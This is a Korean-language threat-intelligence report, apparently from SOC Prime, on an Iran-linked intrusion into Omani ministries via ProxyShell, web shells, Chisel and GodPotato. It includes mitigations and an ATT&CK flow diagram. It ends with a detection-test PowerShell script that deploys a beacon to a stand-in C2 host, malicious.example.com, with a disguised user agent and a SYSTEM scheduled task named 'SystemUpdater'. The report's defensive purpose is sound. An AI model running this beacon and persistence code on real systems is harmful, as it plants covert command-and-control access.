이란 연계 공격으로 26,000명의 시민 기록 노출, 오만에서 발생

Ruslan Mikhalov SOC Prime에서 위협 연구 책임자

팔로우

Detection stack

AIDR
Alert
ETL
Query

위협 보고서
공격 흐름
탐지
시뮬레이션

요약

이란과 연계된 국가 지원 위협 행위자가 아랍에미리트의 VPS에 호스팅된 웹쉘과 ProxyShell 익스플로잇 및 커스텀 명령 및 제어 환경을 사용하여 오만의 여러 정부부처를 침해했습니다. 공격자는 26,000명 이상의 사용자 기록과 레지스트리 하이브를 탈취한 후 Chisel, GodPotato 등의 사후 침해 도구를 배포하여 접근을 심화했습니다. 이 작전은 공격자의 도구, 스크립트 및 C2 로그를 의도치 않게 공개한 열린 디렉터리에 의해 더 많이 드러나, 전체 침투 라이프사이클에 대한 가시성을 제공했습니다.

조사

연구원들은 노출된 VPS에 접속하여 172.86.76.127 을 식별하고 웹쉘, Python 기반의 명령 및 제어 스크립트, 권한 상승 도구, ProxyShell 및 DNN SSRF 취약점을 목표로 한 여러 익스플로잇 스크립트를 발견했습니다. 네트워크 로그는 8001 and 8002포트를 통한 비콘 활동과 비밀 접근을 위한 Chisel 터널 사용을 보여주었습니다. 조사는 또한 예약된 작업 생성, 레지스트리 하이브 추출, 침해된 시스템으로부터의 대규모 데이터 덤핑을 문서화했습니다.

완화 조치

조직은 Microsoft Exchange의 ProxyShell과 관련된 모든 패치를 적용하고 CVE-2025-32372로 추적된 DNN SSRF 문제를 수정해야 합니다. 웹 애플리케이션은 강화되어야 하며, IIS 계정은 최소 권한으로 운영되어야 하며, 사용하지 않는 ASP.NET 페이지는 가능한 한 비활성화되어야 합니다. 방어자는 또한 웹 애플리케이션 방화벽을 배포하고, 비정상 포트로의 아웃바운드 트래픽을 모니터링하며, 인터넷에 연결된 서버를 정기적으로 검사하여 버림받거나 노출된 디렉터리가 있는지 확인해야 합니다.

대응

보안 팀은 웹쉘 접근 패턴, PowerShell 비콘 동작, Chisel 터널 활동, 및 의심스러운 예약 작업 생성에 대한 탐지를 만들어야 합니다. 사건 대응자들은 웹 서버 로그, 레지스트리 하이브 및 법의학 분석을 위한 데이터베이스 덤프를 수집해야 합니다. 영향을 받은 시스템은 격리되어야 하며, 자격 증명은 변경되어야 하며, 관련 오만 당국이나 이해 관계자에게 즉시 통보되어야 합니다.

“graph TB %% Class Definitions Section classDef technique fill:#c2e0ff classDef tool fill:#cccccc %% Node Definitions u2013 Techniques initial_access[“Technique – T1190 Exploit Public-Facing Application
Method: ProxyShell & DNN SSRF”] class initial_access technique remote_services[“Technique – T1210 Exploitation of Remote Services
Lateral movement”] class remote_services technique web_shell[“Technique – T1505.003 Web Shell
Deployed: hc2.aspx / health_check_t.aspx”] class web_shell technique c2_bidir[“Technique – T1102.002 Web Service Bidirectional Communication
HTTP C2 server”] class c2_bidir technique tunneling[“Technique – T1572 Protocol Tunneling & T1219.001 IDE Tunneling
Tool: Chisel”] class tunneling technique weaken_enc[“Technique – T1600 Weaken Encryption
Applied to tunnel”] class weaken_enc technique priv_esc[“Technique – T1134.003 Access Token Manipulation & T1068 Exploitation for Privilege Escalation
Tool: GodPotato”] class priv_esc technique account_manip[“Technique – T1098 Account Manipulation
Maintain elevated rights”] class account_manip technique cred_access[“Technique – T1012 Query Registry
Steal SAM/System hives”] class cred_access technique def_evasion[“Technique – T1562 Impair Defenses & T1668 Exclusive Control
Disable AV”] class def_evasion technique discovery[“Technique – T1592.002 Gather Victim Host Info & T1590.001 Network Domain Properties“] class discovery technique exfiltration[“Technique – T1041 Exfiltration Over C2 Channel & T1030 Data Transfer Size Limits“] class exfiltration technique oneway[“Technique – T1102.003 One-Way Web Service Communication
Result posting”] class oneway technique %% Node Definitions u2013 Tools / Malware tool_proxyshell[“Tool – Name: ProxyShell
Purpose: Exploit Exchange Server”] class tool_proxyshell tool tool_chisel[“Tool – Name: Chisel
Purpose: Tunneling”] class tool_chisel tool tool_godpotato[“Tool – Name: GodPotato
Purpose: Privilege escalation”] class tool_godpotato tool %% Connections u2013 Attack Flow initial_access –>|leads_to| remote_services initial_access –>|uses| tool_proxyshell remote_services –>|leads_to| web_shell web_shell –>|enables| c2_bidir c2_bidir –>|uses| tunneling tunneling –>|uses| tool_chisel tunneling –>|enables| weaken_enc weaken_enc –>|enables| priv_esc priv_esc –>|uses| tool_godpotato priv_esc –>|enables| account_manip account_manip –>|enables| cred_access cred_access –>|enables| def_evasion def_evasion –>|enables| discovery discovery –>|enables| exfiltration exfiltration –>|uses| oneway “

공격 흐름

공격 서사 및 명령:
공격자는 이미 피해자 시스템에 발판을 마련했으며 저소음 C2 비콘을 설정하고자 합니다. 그들은 PowerShell 스크립트 new_beacon.ps1 을 사용자의 AppData 폴더에 배치합니다. 이 스크립트는 무한 루프 내에서 30초마다 원격 C2를 폴링합니다. 각 HTTP 요청은 일반적인 웹 트래픽과 잘 어울리도록 크롬 UA 문자열로 구성되어 네트워크 기반 탐지를 회피합니다(T1217, T1674). 공격자는 지속성을 보장하기 위해 예약된 작업을 통해 비콘을 시작합니다(T1204.004).

회귀 테스트 스크립트:

# -------------------------------------------------
# 새로운 비콘 PowerShell 비콘 배포 및 시작
# -------------------------------------------------
$beaconPath = "$env:APPDATAnew_beacon.ps1"
$c2Url = "http://malicious.example.com/beacon"

# 1. 비콘 스크립트 작성 (모의 경량 버전)
$scriptContent = @'
while ($true) {
    $headers = @{
        "User-Agent" = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36"
    }
    try {
        Invoke-WebRequest -Uri "$using:c2Url" -Headers $headers -Method GET -TimeoutSec 10 | Out-Null
    } catch {}
    Start-Sleep -Seconds 30
}
'@
Set-Content -Path $beaconPath -Value $scriptContent -Encoding UTF8

# 2. 지속성을 위한 예약된 작업 등록 (매 분마다 실행)
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoProfile -ExecutionPolicy Bypass -File `"$beaconPath`""
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration ([TimeSpan]::MaxValue)
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest
Register-ScheduledTask -TaskName "SystemUpdater" -Action $action -Trigger $trigger -Principal $principal -Force

Write-Host "Beacon deployed and scheduled task created."

정리 명령어:

# -------------------------------------------------
# 비콘 및 예약된 작업 제거
# -------------------------------------------------
$beaconPath = "$env:APPDATAnew_beacon.ps1"
Unregister-ScheduledTask -TaskName "SystemUpdater" -Confirm:$false
Remove-Item -Path $beaconPath -Force -ErrorAction SilentlyContinue
Write-Host "Cleanup completed."

SOC Prime의 Detection as Code 플랫폼에 가입하세요 귀사의 비즈니스에 가장 중요한 위협에 대한 가시성을 개선하세요. 시작을 돕고 즉각적인 가치를 제공하기 위해 지금 SOC Prime 전문가와의 회의를 예약하세요.

무료 가입